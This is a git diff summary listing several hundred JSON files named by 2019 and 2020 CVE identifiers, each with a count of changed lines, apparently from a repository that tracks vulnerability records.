2019/CVE-2019-12255.json | 3 +- 2019/CVE-2019-12272.json | 6 +- 2019/CVE-2019-12314.json | 3 +- 2019/CVE-2019-12384.json | 6 +- 2019/CVE-2019-12409.json | 3 +- 2019/CVE-2019-12453.json | 3 +- 2019/CVE-2019-12460.json | 3 +- 2019/CVE-2019-12475.json | 3 +- 2019/CVE-2019-12476.json | 3 +- 2019/CVE-2019-12489.json | 3 +- 2019/CVE-2019-1253.json | 12 +- 2019/CVE-2019-12538.json | 3 +- 2019/CVE-2019-12541.json | 3 +- 2019/CVE-2019-12542.json | 3 +- 2019/CVE-2019-12543.json | 3 +- 2019/CVE-2019-12562.json | 3 +- 2019/CVE-2019-12586.json | 3 +- 2019/CVE-2019-12594.json | 3 +- 2019/CVE-2019-12616.json | 3 +- 2019/CVE-2019-12725.json | 12 +- 2019/CVE-2019-12735.json | 15 +- 2019/CVE-2019-12744.json | 3 +- 2019/CVE-2019-12750.json | 3 +- 2019/CVE-2019-12796.json | 3 +- 2019/CVE-2019-12814.json | 3 +- 2019/CVE-2019-12815.json | 6 +- 2019/CVE-2019-12836.json | 3 +- 2019/CVE-2019-12840.json | 18 +- 2019/CVE-2019-12889.json | 3 +- 2019/CVE-2019-12890.json | 3 +- 2019/CVE-2019-12937.json | 3 +- 2019/CVE-2019-12949.json | 3 +- 2019/CVE-2019-12999.json | 3 +- 2019/CVE-2019-13000.json | 3 +- 2019/CVE-2019-13024.json | 6 +- 2019/CVE-2019-13025.json | 3 +- 2019/CVE-2019-13027.json | 3 +- 2019/CVE-2019-13051.json | 3 +- 2019/CVE-2019-13063.json | 3 +- 2019/CVE-2019-13086.json | 3 +- 2019/CVE-2019-13101.json | 3 +- 2019/CVE-2019-13115.json | 6 +- 2019/CVE-2019-13143.json | 3 +- 2019/CVE-2019-13144.json | 3 +- 2019/CVE-2019-1315.json | 3 +- 2019/CVE-2019-13272.json | 51 +- 2019/CVE-2019-13288.json | 6 +- 2019/CVE-2019-13292.json | 3 +- 2019/CVE-2019-1332.json | 3 +- 2019/CVE-2019-13361.json | 3 +- 2019/CVE-2019-13403.json | 3 +- 2019/CVE-2019-13404.json | 3 +- 2019/CVE-2019-13496.json | 3 +- 2019/CVE-2019-13497.json | 3 +- 2019/CVE-2019-13498.json | 3 +- 2019/CVE-2019-1351.json | 3 +- 2019/CVE-2019-13574.json | 3 +- 2019/CVE-2019-13633.json | 3 +- 2019/CVE-2019-1367.json | 3 +- 2019/CVE-2019-13720.json | 6 +- 2019/CVE-2019-13764.json | 3 +- 2019/CVE-2019-1385.json | 3 +- 2019/CVE-2019-1388.json | 15 +- 2019/CVE-2019-13956.json | 3 +- 2019/CVE-2019-13990.json | 3 +- 2019/CVE-2019-1402.json | 3 +- 2019/CVE-2019-14040.json | 3 +- 2019/CVE-2019-14041.json | 3 +- 2019/CVE-2019-1405.json | 3 +- 2019/CVE-2019-14079.json | 3 +- 2019/CVE-2019-1422.json | 3 +- 2019/CVE-2019-14220.json | 3 +- 2019/CVE-2019-14234.json | 3 +- 2019/CVE-2019-14267.json | 3 +- 2019/CVE-2019-14271.json | 3 +- 2019/CVE-2019-14287.json | 78 ++- 2019/CVE-2019-14314.json | 3 +- 2019/CVE-2019-14319.json | 3 +- 2019/CVE-2019-14322.json | 9 +- 2019/CVE-2019-14326.json | 3 +- 2019/CVE-2019-14339.json | 3 +- 2019/CVE-2019-14439.json | 3 +- 2019/CVE-2019-14450.json | 3 +- 2019/CVE-2019-14514.json | 3 +- 2019/CVE-2019-14529.json | 3 +- 2019/CVE-2019-14530.json | 6 +- 2019/CVE-2019-14537.json | 3 +- 2019/CVE-2019-14540.json | 3 +- 2019/CVE-2019-1458.json | 9 +- 2019/CVE-2019-14615.json | 3 +- 2019/CVE-2019-14678.json | 3 +- 2019/CVE-2019-14745.json | 3 +- 2019/CVE-2019-14751.json | 3 +- 2019/CVE-2019-1476.json | 3 +- 2019/CVE-2019-14830.json | 3 +- 2019/CVE-2019-14900.json | 3 +- 2019/CVE-2019-14912.json | 3 +- 2019/CVE-2019-14974.json | 3 +- 2019/CVE-2019-15029.json | 3 +- 2019/CVE-2019-15043.json | 3 +- 2019/CVE-2019-15053.json | 3 +- 2019/CVE-2019-15107.json | 102 ++-- 2019/CVE-2019-15120.json | 3 +- 2019/CVE-2019-15126.json | 9 +- 2019/CVE-2019-15166.json | 3 +- 2019/CVE-2019-15224.json | 3 +- 2019/CVE-2019-15231.json | 3 +- 2019/CVE-2019-15233.json | 3 +- 2019/CVE-2019-15477.json | 3 +- 2019/CVE-2019-15511.json | 3 +- 2019/CVE-2019-15514.json | 3 +- 2019/CVE-2019-15588.json | 3 +- 2019/CVE-2019-15605.json | 3 +- 2019/CVE-2019-15642.json | 3 +- 2019/CVE-2019-1579.json | 6 +- 2019/CVE-2019-15813.json | 3 +- 2019/CVE-2019-15846.json | 3 +- 2019/CVE-2019-15858.json | 6 +- 2019/CVE-2019-15896.json | 3 +- 2019/CVE-2019-15972.json | 3 +- 2019/CVE-2019-16097.json | 18 +- 2019/CVE-2019-16098.json | 9 +- 2019/CVE-2019-16113.json | 30 +- 2019/CVE-2019-16172.json | 3 +- 2019/CVE-2019-16253.json | 3 +- 2019/CVE-2019-16278.json | 39 +- 2019/CVE-2019-16279.json | 3 +- 2019/CVE-2019-16374.json | 3 +- 2019/CVE-2019-16394.json | 3 +- 2019/CVE-2019-16405.json | 3 +- 2019/CVE-2019-16516.json | 3 +- 2019/CVE-2019-1652.json | 3 +- 2019/CVE-2019-1653.json | 9 +- 2019/CVE-2019-1663.json | 6 +- 2019/CVE-2019-16662.json | 3 +- 2019/CVE-2019-16663.json | 3 +- 2019/CVE-2019-16692.json | 3 +- 2019/CVE-2019-16724.json | 3 +- 2019/CVE-2019-16746.json | 3 +- 2019/CVE-2019-16759.json | 39 +- 2019/CVE-2019-16784.json | 6 +- 2019/CVE-2019-16889.json | 3 +- 2019/CVE-2019-16920.json | 3 +- 2019/CVE-2019-16941.json | 3 +- 2019/CVE-2019-1698.json | 3 +- 2019/CVE-2019-17026.json | 6 +- 2019/CVE-2019-17041.json | 3 +- 2019/CVE-2019-17080.json | 6 +- 2019/CVE-2019-17124.json | 3 +- 2019/CVE-2019-17137.json | 3 +- 2019/CVE-2019-17147.json | 3 +- 2019/CVE-2019-17195.json | 3 +- 2019/CVE-2019-17221.json | 3 +- 2019/CVE-2019-17225.json | 3 +- 2019/CVE-2019-17234.json | 3 +- 2019/CVE-2019-17240.json | 24 +- 2019/CVE-2019-17382.json | 3 +- 2019/CVE-2019-17424.json | 3 +- 2019/CVE-2019-17427.json | 3 +- 2019/CVE-2019-17495.json | 3 +- 2019/CVE-2019-17497.json | 3 +- 2019/CVE-2019-17498.json | 3 +- 2019/CVE-2019-17513.json | 3 +- 2019/CVE-2019-17525.json | 3 +- 2019/CVE-2019-17558.json | 12 +- 2019/CVE-2019-17564.json | 18 +- 2019/CVE-2019-17570.json | 6 +- 2019/CVE-2019-17571.json | 9 +- 2019/CVE-2019-1759.json | 3 +- 2019/CVE-2019-17596.json | 3 +- 2019/CVE-2019-17621.json | 3 +- 2019/CVE-2019-17625.json | 3 +- 2019/CVE-2019-17633.json | 3 +- 2019/CVE-2019-17638.json | 3 +- 2019/CVE-2019-17658.json | 3 +- 2019/CVE-2019-17662.json | 24 +- 2019/CVE-2019-17666.json | 3 +- 2019/CVE-2019-17671.json | 3 +- 2019/CVE-2019-1821.json | 3 +- 2019/CVE-2019-18276.json | 6 +- 2019/CVE-2019-18370.json | 3 +- 2019/CVE-2019-18371.json | 9 +- 2019/CVE-2019-18426.json | 3 +- 2019/CVE-2019-18634.json | 30 +- 2019/CVE-2019-18655.json | 3 +- 2019/CVE-2019-18683.json | 6 +- 2019/CVE-2019-1881.json | 3 +- 2019/CVE-2019-18818.json | 12 +- 2019/CVE-2019-18845.json | 3 +- 2019/CVE-2019-18873.json | 3 +- 2019/CVE-2019-18885.json | 3 +- 2019/CVE-2019-18890.json | 3 +- 2019/CVE-2019-18935.json | 33 +- 2019/CVE-2019-18988.json | 6 +- 2019/CVE-2019-19012.json | 6 +- 2019/CVE-2019-19030.json | 3 +- 2019/CVE-2019-19033.json | 3 +- 2019/CVE-2019-19194.json | 3 +- 2019/CVE-2019-19203.json | 6 +- 2019/CVE-2019-19204.json | 6 +- 2019/CVE-2019-19231.json | 3 +- 2019/CVE-2019-19268.json | 3 +- 2019/CVE-2019-19315.json | 3 +- 2019/CVE-2019-19356.json | 6 +- 2019/CVE-2019-19369.json | 3 +- 2019/CVE-2019-19383.json | 3 +- 2019/CVE-2019-19393.json | 3 +- 2019/CVE-2019-19447.json | 3 +- 2019/CVE-2019-19470.json | 3 +- 2019/CVE-2019-19492.json | 9 +- 2019/CVE-2019-19511.json | 3 +- 2019/CVE-2019-19520.json | 3 +- 2019/CVE-2019-19547.json | 3 +- 2019/CVE-2019-19550.json | 6 +- 2019/CVE-2019-19576.json | 3 +- 2019/CVE-2019-19609.json | 21 +- 2019/CVE-2019-19633.json | 3 +- 2019/CVE-2019-19634.json | 3 +- 2019/CVE-2019-19651.json | 3 +- 2019/CVE-2019-19652.json | 3 +- 2019/CVE-2019-19653.json | 3 +- 2019/CVE-2019-19654.json | 3 +- 2019/CVE-2019-19658.json | 3 +- 2019/CVE-2019-19699.json | 3 +- 2019/CVE-2019-19781.json | 141 +++-- 2019/CVE-2019-19782.json | 3 +- 2019/CVE-2019-19844.json | 9 +- 2019/CVE-2019-19871.json | 3 +- 2019/CVE-2019-19905.json | 3 +- 2019/CVE-2019-19945.json | 3 +- 2019/CVE-2019-20059.json | 3 +- 2019/CVE-2019-20085.json | 3 +- 2019/CVE-2019-20197.json | 6 +- 2019/CVE-2019-20224.json | 3 +- 2019/CVE-2019-20326.json | 3 +- 2019/CVE-2019-20361.json | 3 +- 2019/CVE-2019-20372.json | 6 +- 2019/CVE-2019-20933.json | 6 +- 2019/CVE-2019-2107.json | 6 +- 2019/CVE-2019-2196.json | 3 +- 2019/CVE-2019-2198.json | 3 +- 2019/CVE-2019-2205.json | 3 +- 2019/CVE-2019-2215.json | 57 +- 2019/CVE-2019-25024.json | 3 +- 2019/CVE-2019-25137.json | 3 +- 2019/CVE-2019-2525.json | 6 +- 2019/CVE-2019-2615.json | 3 +- 2019/CVE-2019-2618.json | 21 +- 2019/CVE-2019-2725.json | 60 +- 2019/CVE-2019-2729.json | 12 +- 2019/CVE-2019-2888.json | 3 +- 2019/CVE-2019-2890.json | 21 +- 2019/CVE-2019-3010.json | 3 +- 2019/CVE-2019-3394.json | 3 +- 2019/CVE-2019-3396.json | 57 +- 2019/CVE-2019-3398.json | 6 +- 2019/CVE-2019-3403.json | 6 +- 2019/CVE-2019-3462.json | 6 +- 2019/CVE-2019-3663.json | 3 +- 2019/CVE-2019-3719.json | 3 +- 2019/CVE-2019-3778.json | 3 +- 2019/CVE-2019-3799.json | 6 +- 2019/CVE-2019-3810.json | 3 +- 2019/CVE-2019-3847.json | 3 +- 2019/CVE-2019-3929.json | 3 +- 2019/CVE-2019-3980.json | 6 +- 2019/CVE-2019-4650.json | 3 +- 2019/CVE-2019-48814.json | 3 +- 2019/CVE-2019-5010.json | 3 +- 2019/CVE-2019-5029.json | 3 +- 2019/CVE-2019-5096.json | 3 +- 2019/CVE-2019-5413.json | 6 +- 2019/CVE-2019-5418.json | 27 +- 2019/CVE-2019-5420.json | 30 +- 2019/CVE-2019-5427.json | 3 +- 2019/CVE-2019-5454.json | 3 +- 2019/CVE-2019-5475.json | 9 +- 2019/CVE-2019-5489.json | 3 +- 2019/CVE-2019-5544.json | 9 +- 2019/CVE-2019-5596.json | 3 +- 2019/CVE-2019-5603.json | 3 +- 2019/CVE-2019-5624.json | 3 +- 2019/CVE-2019-5630.json | 3 +- 2019/CVE-2019-5700.json | 3 +- 2019/CVE-2019-5736.json | 81 ++- 2019/CVE-2019-5737.json | 3 +- 2019/CVE-2019-5782.json | 3 +- 2019/CVE-2019-5784.json | 3 +- 2019/CVE-2019-5786.json | 3 +- 2019/CVE-2019-5822.json | 3 +- 2019/CVE-2019-5825.json | 3 +- 2019/CVE-2019-5893.json | 3 +- 2019/CVE-2019-6111.json | 6 +- 2019/CVE-2019-6203.json | 3 +- 2019/CVE-2019-6207.json | 9 +- 2019/CVE-2019-6225.json | 9 +- 2019/CVE-2019-6249.json | 3 +- 2019/CVE-2019-6250.json | 3 +- 2019/CVE-2019-6260.json | 3 +- 2019/CVE-2019-6263.json | 3 +- 2019/CVE-2019-6329.json | 3 +- 2019/CVE-2019-6339.json | 3 +- 2019/CVE-2019-6340.json | 27 +- 2019/CVE-2019-6440.json | 3 +- 2019/CVE-2019-6446.json | 3 +- 2019/CVE-2019-6447.json | 39 +- 2019/CVE-2019-6453.json | 6 +- 2019/CVE-2019-6467.json | 3 +- 2019/CVE-2019-6487.json | 3 +- 2019/CVE-2019-6690.json | 6 +- 2019/CVE-2019-6693.json | 9 +- 2019/CVE-2019-6715.json | 3 +- 2019/CVE-2019-7192.json | 6 +- 2019/CVE-2019-7213.json | 3 +- 2019/CVE-2019-7214.json | 6 +- 2019/CVE-2019-7216.json | 3 +- 2019/CVE-2019-7219.json | 3 +- 2019/CVE-2019-7238.json | 15 +- 2019/CVE-2019-7304.json | 12 +- 2019/CVE-2019-7356.json | 3 +- 2019/CVE-2019-7357.json | 3 +- 2019/CVE-2019-7406.json | 3 +- 2019/CVE-2019-7482.json | 9 +- 2019/CVE-2019-7489.json | 3 +- 2019/CVE-2019-7609.json | 30 +- 2019/CVE-2019-7616.json | 3 +- 2019/CVE-2019-7642.json | 3 +- 2019/CVE-2019-7839.json | 3 +- 2019/CVE-2019-8014.json | 3 +- 2019/CVE-2019-8331.json | 6 +- 2019/CVE-2019-8341.json | 3 +- 2019/CVE-2019-8389.json | 3 +- 2019/CVE-2019-8449.json | 6 +- 2019/CVE-2019-8451.json | 12 +- 2019/CVE-2019-8540.json | 3 +- 2019/CVE-2019-8561.json | 3 +- 2019/CVE-2019-8591.json | 3 +- 2019/CVE-2019-8601.json | 3 +- 2019/CVE-2019-8605.json | 3 +- 2019/CVE-2019-8627.json | 3 +- 2019/CVE-2019-8641.json | 3 +- 2019/CVE-2019-8656.json | 3 +- 2019/CVE-2019-8781.json | 6 +- 2019/CVE-2019-8791.json | 3 +- 2019/CVE-2019-8805.json | 3 +- 2019/CVE-2019-8852.json | 3 +- 2019/CVE-2019-8936.json | 3 +- 2019/CVE-2019-8942.json | 12 +- 2019/CVE-2019-8943.json | 6 +- 2019/CVE-2019-8956.json | 3 +- 2019/CVE-2019-8978.json | 3 +- 2019/CVE-2019-8979.json | 3 +- 2019/CVE-2019-8985.json | 3 +- 2019/CVE-2019-8997.json | 3 +- 2019/CVE-2019-905.json | 3 +- 2019/CVE-2019-9053.json | 66 +- 2019/CVE-2019-9081.json | 9 +- 2019/CVE-2019-9153.json | 3 +- 2019/CVE-2019-9184.json | 3 +- 2019/CVE-2019-9193.json | 21 +- 2019/CVE-2019-9194.json | 3 +- 2019/CVE-2019-9202.json | 3 +- 2019/CVE-2019-9465.json | 6 +- 2019/CVE-2019-9506.json | 3 +- 2019/CVE-2019-9511.json | 3 +- 2019/CVE-2019-9580.json | 3 +- 2019/CVE-2019-9596.json | 3 +- 2019/CVE-2019-9599.json | 3 +- 2019/CVE-2019-9621.json | 3 +- 2019/CVE-2019-9653.json | 3 +- 2019/CVE-2019-9670.json | 18 +- 2019/CVE-2019-9673.json | 3 +- 2019/CVE-2019-9729.json | 12 +- 2019/CVE-2019-9730.json | 3 +- 2019/CVE-2019-9745.json | 3 +- 2019/CVE-2019-9766.json | 6 +- 2019/CVE-2019-9787.json | 18 +- 2019/CVE-2019-9791.json | 3 +- 2019/CVE-2019-9810.json | 6 +- 2019/CVE-2019-9849.json | 3 +- 2019/CVE-2019-9896.json | 3 +- 2019/CVE-2019-9978.json | 27 +- 2020/CVE-2020-0001.json | 3 +- 2020/CVE-2020-0014.json | 3 +- 2020/CVE-2020-0022.json | 21 +- 2020/CVE-2020-0023.json | 3 +- 2020/CVE-2020-0041.json | 15 +- 2020/CVE-2020-0069.json | 15 +- 2020/CVE-2020-0082.json | 3 +- 2020/CVE-2020-0096.json | 12 +- 2020/CVE-2020-0108.json | 3 +- 2020/CVE-2020-0113.json | 3 +- 2020/CVE-2020-0114.json | 3 +- 2020/CVE-2020-0121.json | 3 +- 2020/CVE-2020-0136.json | 3 +- 2020/CVE-2020-0137.json | 6 +- 2020/CVE-2020-0138.json | 3 +- 2020/CVE-2020-0155.json | 3 +- 2020/CVE-2020-0160.json | 3 +- 2020/CVE-2020-0181.json | 3 +- 2020/CVE-2020-0183.json | 6 +- 2020/CVE-2020-0188.json | 9 +- 2020/CVE-2020-0198.json | 3 +- 2020/CVE-2020-0201.json | 6 +- 2020/CVE-2020-0203.json | 3 +- 2020/CVE-2020-0209.json | 3 +- 2020/CVE-2020-0215.json | 3 +- 2020/CVE-2020-0218.json | 3 +- 2020/CVE-2020-0219.json | 12 +- 2020/CVE-2020-0225.json | 3 +- 2020/CVE-2020-0226.json | 6 +- 2020/CVE-2020-0227.json | 3 +- 2020/CVE-2020-0240.json | 3 +- 2020/CVE-2020-0241.json | 3 +- 2020/CVE-2020-0242.json | 6 +- 2020/CVE-2020-0245.json | 3 +- 2020/CVE-2020-0377.json | 3 +- 2020/CVE-2020-0380.json | 3 +- 2020/CVE-2020-0381.json | 3 +- 2020/CVE-2020-0391.json | 3 +- 2020/CVE-2020-0392.json | 3 +- 2020/CVE-2020-0394.json | 9 +- 2020/CVE-2020-0401.json | 6 +- 2020/CVE-2020-0409.json | 3 +- 2020/CVE-2020-0413.json | 3 +- 2020/CVE-2020-0416.json | 6 +- 2020/CVE-2020-0418.json | 6 +- 2020/CVE-2020-0421.json | 3 +- 2020/CVE-2020-0423.json | 3 +- 2020/CVE-2020-0439.json | 3 +- 2020/CVE-2020-0443.json | 3 +- 2020/CVE-2020-0451.json | 3 +- 2020/CVE-2020-0452.json | 3 +- 2020/CVE-2020-0453.json | 9 +- 2020/CVE-2020-0458.json | 3 +- 2020/CVE-2020-0463.json | 3 +- 2020/CVE-2020-0471.json | 3 +- 2020/CVE-2020-0551.json | 3 +- 2020/CVE-2020-0557.json | 3 +- 2020/CVE-2020-0568.json | 3 +- 2020/CVE-2020-0601.json | 108 ++-- 2020/CVE-2020-0609.json | 15 +- 2020/CVE-2020-0618.json | 9 +- 2020/CVE-2020-0624.json | 3 +- 2020/CVE-2020-0668.json | 18 +- 2020/CVE-2020-0674.json | 12 +- 2020/CVE-2020-0683.json | 3 +- 2020/CVE-2020-0688.json | 72 ++- 2020/CVE-2020-0728.json | 3 +- 2020/CVE-2020-0753.json | 6 +- 2020/CVE-2020-0787.json | 12 +- 2020/CVE-2020-0796.json | 231 ++++--- 2020/CVE-2020-0887.json | 3 +- 2020/CVE-2020-0890.json | 9 +- 2020/CVE-2020-0910.json | 3 +- 2020/CVE-2020-0976.json | 3 +- 2020/CVE-2020-10128.json | 3 +- 2020/CVE-2020-10129.json | 3 +- 2020/CVE-2020-10130.json | 3 +- 2020/CVE-2020-10131.json | 3 +- 2020/CVE-2020-10132.json | 3 +- 2020/CVE-2020-10135.json | 3 +- 2020/CVE-2020-10148.json | 6 +- 2020/CVE-2020-1015.json | 3 +- 2020/CVE-2020-10189.json | 3 +- 2020/CVE-2020-10199.json | 18 +- 2020/CVE-2020-1020.json | 6 +- 2020/CVE-2020-10204.json | 3 +- 2020/CVE-2020-10238.json | 3 +- 2020/CVE-2020-10239.json | 3 +- 2020/CVE-2020-1034.json | 6 +- 2020/CVE-2020-1048.json | 12 +- 2020/CVE-2020-1054.json | 12 +- 2020/CVE-2020-10551.json | 3 +- 2020/CVE-2020-10558.json | 6 +- 2020/CVE-2020-10560.json | 6 +- 2020/CVE-2020-10596.json | 6 +- 2020/CVE-2020-1066.json | 6 +- 2020/CVE-2020-10663.json | 3 +- 2020/CVE-2020-10665.json | 3 +- 2020/CVE-2020-10673.json | 6 +- 2020/CVE-2020-10713.json | 3 +- 2020/CVE-2020-10749.json | 3 +- 2020/CVE-2020-10757.json | 3 +- 2020/CVE-2020-10759.json | 3 +- 2020/CVE-2020-10770.json | 3 +- 2020/CVE-2020-10882.json | 3 +- 2020/CVE-2020-10915.json | 3 +- 2020/CVE-2020-10963.json | 3 +- 2020/CVE-2020-10977.json | 24 +- 2020/CVE-2020-11019.json | 3 +- 2020/CVE-2020-1102.json | 3 +- 2020/CVE-2020-11022.json | 6 +- 2020/CVE-2020-11023.json | 9 +- 2020/CVE-2020-11060.json | 3 +- 2020/CVE-2020-11076.json | 3 +- 2020/CVE-2020-11107.json | 6 +- 2020/CVE-2020-11108.json | 3 +- 2020/CVE-2020-11110.json | 3 +- 2020/CVE-2020-11113.json | 3 +- 2020/CVE-2020-11444.json | 6 +- 2020/CVE-2020-11492.json | 3 +- 2020/CVE-2020-11493.json | 3 +- 2020/CVE-2020-11519.json | 3 +- 2020/CVE-2020-11539.json | 3 +- 2020/CVE-2020-11546.json | 6 +- 2020/CVE-2020-11547.json | 3 +- 2020/CVE-2020-11579.json | 3 +- 2020/CVE-2020-11650.json | 3 +- 2020/CVE-2020-11651.json | 36 +- 2020/CVE-2020-11652.json | 9 +- 2020/CVE-2020-11738.json | 3 +- 2020/CVE-2020-11794.json | 3 +- 2020/CVE-2020-11819.json | 3 +- 2020/CVE-2020-11851.json | 3 +- 2020/CVE-2020-11881.json | 3 +- 2020/CVE-2020-11883.json | 3 +- 2020/CVE-2020-11890.json | 3 +- 2020/CVE-2020-11896.json | 6 +- 2020/CVE-2020-11898.json | 3 +- 2020/CVE-2020-11932.json | 9 +- 2020/CVE-2020-11975.json | 3 +- 2020/CVE-2020-11978.json | 3 +- 2020/CVE-2020-11989.json | 3 +- 2020/CVE-2020-11990.json | 3 +- 2020/CVE-2020-11996.json | 3 +- 2020/CVE-2020-1206.json | 12 +- 2020/CVE-2020-12077.json | 3 +- 2020/CVE-2020-12078.json | 6 +- 2020/CVE-2020-12112.json | 3 +- 2020/CVE-2020-12116.json | 3 +- 2020/CVE-2020-12124.json | 6 +- 2020/CVE-2020-12255.json | 3 +- 2020/CVE-2020-12351.json | 3 +- 2020/CVE-2020-12432.json | 3 +- 2020/CVE-2020-12593.json | 3 +- 2020/CVE-2020-12625.json | 3 +- 2020/CVE-2020-12629.json | 3 +- 2020/CVE-2020-12640.json | 3 +- 2020/CVE-2020-12641.json | 6 +- 2020/CVE-2020-12688.json | 3 +- 2020/CVE-2020-12695.json | 6 +- 2020/CVE-2020-12696.json | 3 +- 2020/CVE-2020-12702.json | 6 +- 2020/CVE-2020-12712.json | 3 +- 2020/CVE-2020-12717.json | 3 +- 2020/CVE-2020-12753.json | 3 +- 2020/CVE-2020-12800.json | 3 +- 2020/CVE-2020-12828.json | 3 +- 2020/CVE-2020-1283.json | 3 +- 2020/CVE-2020-12856.json | 3 +- 2020/CVE-2020-12928.json | 3 +- 2020/CVE-2020-1301.json | 3 +- 2020/CVE-2020-13094.json | 3 +- 2020/CVE-2020-1313.json | 3 +- 2020/CVE-2020-13151.json | 3 +- 2020/CVE-2020-13158.json | 3 +- 2020/CVE-2020-13159.json | 3 +- 2020/CVE-2020-13162.json | 3 +- 2020/CVE-2020-13254.json | 3 +- 2020/CVE-2020-13259.json | 3 +- 2020/CVE-2020-13277.json | 3 +- 2020/CVE-2020-1337.json | 15 +- 2020/CVE-2020-13401.json | 3 +- 2020/CVE-2020-13405.json | 3 +- 2020/CVE-2020-13424.json | 3 +- 2020/CVE-2020-13457.json | 3 +- 2020/CVE-2020-1349.json | 3 +- 2020/CVE-2020-1350.json | 42 +- 2020/CVE-2020-13519.json | 3 +- 2020/CVE-2020-1362.json | 3 +- 2020/CVE-2020-13640.json | 3 +- 2020/CVE-2020-13699.json | 3 +- 2020/CVE-2020-13777.json | 9 +- 2020/CVE-2020-13851.json | 3 +- 2020/CVE-2020-13884.json | 3 +- 2020/CVE-2020-13885.json | 3 +- 2020/CVE-2020-13886.json | 3 +- 2020/CVE-2020-13889.json | 3 +- 2020/CVE-2020-13925.json | 3 +- 2020/CVE-2020-13933.json | 9 +- 2020/CVE-2020-13935.json | 6 +- 2020/CVE-2020-13937.json | 9 +- 2020/CVE-2020-13942.json | 21 +- 2020/CVE-2020-13945.json | 9 +- 2020/CVE-2020-13957.json | 3 +- 2020/CVE-2020-13958.json | 3 +- 2020/CVE-2020-13965.json | 3 +- 2020/CVE-2020-13973.json | 3 +- 2020/CVE-2020-13995.json | 3 +- 2020/CVE-2020-13996.json | 3 +- 2020/CVE-2020-14064.json | 3 +- 2020/CVE-2020-14065.json | 6 +- 2020/CVE-2020-14066.json | 6 +- 2020/CVE-2020-14144.json | 3 +- 2020/CVE-2020-14179.json | 9 +- 2020/CVE-2020-14181.json | 9 +- 2020/CVE-2020-14195.json | 3 +- 2020/CVE-2020-14210.json | 3 +- 2020/CVE-2020-14292.json | 3 +- 2020/CVE-2020-14293.json | 3 +- 2020/CVE-2020-14294.json | 3 +- 2020/CVE-2020-14295.json | 6 +- 2020/CVE-2020-14321.json | 9 +- 2020/CVE-2020-14343.json | 3 +- 2020/CVE-2020-14356.json | 3 +- 2020/CVE-2020-14364.json | 6 +- 2020/CVE-2020-14368.json | 3 +- 2020/CVE-2020-14372.json | 3 +- 2020/CVE-2020-14381.json | 3 +- 2020/CVE-2020-14386.json | 3 +- 2020/CVE-2020-14644.json | 3 +- 2020/CVE-2020-14645.json | 15 +- 2020/CVE-2020-1472.json | 198 ++++-- 2020/CVE-2020-14750.json | 6 +- 2020/CVE-2020-14756.json | 6 +- 2020/CVE-2020-14871.json | 3 +- 2020/CVE-2020-14882.json | 96 ++- 2020/CVE-2020-14883.json | 18 +- 2020/CVE-2020-1493.json | 3 +- 2020/CVE-2020-14947.json | 3 +- 2020/CVE-2020-14955.json | 3 +- 2020/CVE-2020-14965.json | 3 +- 2020/CVE-2020-14974.json | 3 +- 2020/CVE-2020-15002.json | 6 +- 2020/CVE-2020-15051.json | 3 +- 2020/CVE-2020-15052.json | 3 +- 2020/CVE-2020-15053.json | 3 +- 2020/CVE-2020-15148.json | 6 +- 2020/CVE-2020-15169.json | 3 +- 2020/CVE-2020-15175.json | 3 +- 2020/CVE-2020-15227.json | 9 +- 2020/CVE-2020-15228.json | 3 +- 2020/CVE-2020-15257.json | 3 +- 2020/CVE-2020-15261.json | 3 +- 2020/CVE-2020-15349.json | 3 +- 2020/CVE-2020-15367.json | 3 +- 2020/CVE-2020-15368.json | 6 +- 2020/CVE-2020-15392.json | 3 +- 2020/CVE-2020-15399.json | 3 +- 2020/CVE-2020-15416.json | 3 +- 2020/CVE-2020-15436.json | 3 +- 2020/CVE-2020-15492.json | 3 +- 2020/CVE-2020-15568.json | 6 +- 2020/CVE-2020-15778.json | 9 +- 2020/CVE-2020-15780.json | 3 +- 2020/CVE-2020-15802.json | 3 +- 2020/CVE-2020-15808.json | 3 +- 2020/CVE-2020-15848.json | 3 +- 2020/CVE-2020-15873.json | 3 +- 2020/CVE-2020-15906.json | 3 +- 2020/CVE-2020-15916.json | 3 +- 2020/CVE-2020-15931.json | 3 +- 2020/CVE-2020-15956.json | 3 +- 2020/CVE-2020-15999.json | 9 +- 2020/CVE-2020-16012.json | 3 +- 2020/CVE-2020-1611.json | 3 +- 2020/CVE-2020-16125.json | 3 +- 2020/CVE-2020-16126.json | 3 +- 2020/CVE-2020-16152.json | 6 +- 2020/CVE-2020-16270.json | 3 +- 2020/CVE-2020-16846.json | 6 +- 2020/CVE-2020-16898.json | 42 +- 2020/CVE-2020-16899.json | 3 +- 2020/CVE-2020-16938.json | 3 +- 2020/CVE-2020-16939.json | 3 +- 2020/CVE-2020-16947.json | 6 +- 2020/CVE-2020-17008.json | 3 +- 2020/CVE-2020-17035.json | 3 +- 2020/CVE-2020-17057.json | 6 +- 2020/CVE-2020-17086.json | 3 +- 2020/CVE-2020-17087.json | 12 +- 2020/CVE-2020-17136.json | 6 +- 2020/CVE-2020-17144.json | 6 +- 2020/CVE-2020-17382.json | 6 +- 2020/CVE-2020-17453.json | 6 +- 2020/CVE-2020-17456.json | 6 +- 2020/CVE-2020-17496.json | 6 +- 2020/CVE-2020-17518.json | 9 +- 2020/CVE-2020-17519.json | 33 +- 2020/CVE-2020-17523.json | 3 +- 2020/CVE-2020-17527.json | 3 +- 2020/CVE-2020-17530.json | 33 +- 2020/CVE-2020-17531.json | 3 +- 2020/CVE-2020-17533.json | 3 +- 2020/CVE-2020-1764.json | 3 +- 2020/CVE-2020-18324.json | 3 +- 2020/CVE-2020-18325.json | 3 +- 2020/CVE-2020-18326.json | 3 +- 2020/CVE-2020-19360.json | 6 +- 2020/CVE-2020-1937.json | 3 +- 2020/CVE-2020-1938.json | 96 ++- 2020/CVE-2020-1947.json | 12 +- 2020/CVE-2020-1948.json | 12 +- 2020/CVE-2020-1956.json | 3 +- 2020/CVE-2020-1958.json | 3 +- 2020/CVE-2020-19586.json | 3 +- 2020/CVE-2020-19587.json | 3 +- 2020/CVE-2020-1967.json | 3 +- 2020/CVE-2020-1971.json | 3 +- 2020/CVE-2020-20093.json | 3 +- 2020/CVE-2020-2023.json | 3 +- 2020/CVE-2020-2034.json | 3 +- 2020/CVE-2020-2038.json | 3 +- 2020/CVE-2020-21378.json | 3 +- 2020/CVE-2020-23160.json | 3 +- 2020/CVE-2020-2333.json | 3 +- 2020/CVE-2020-23342.json | 3 +- 2020/CVE-2020-23489.json | 3 +- 2020/CVE-2020-23582.json | 3 +- 2020/CVE-2020-23583.json | 3 +- 2020/CVE-2020-23584.json | 3 +- 2020/CVE-2020-23585.json | 3 +- 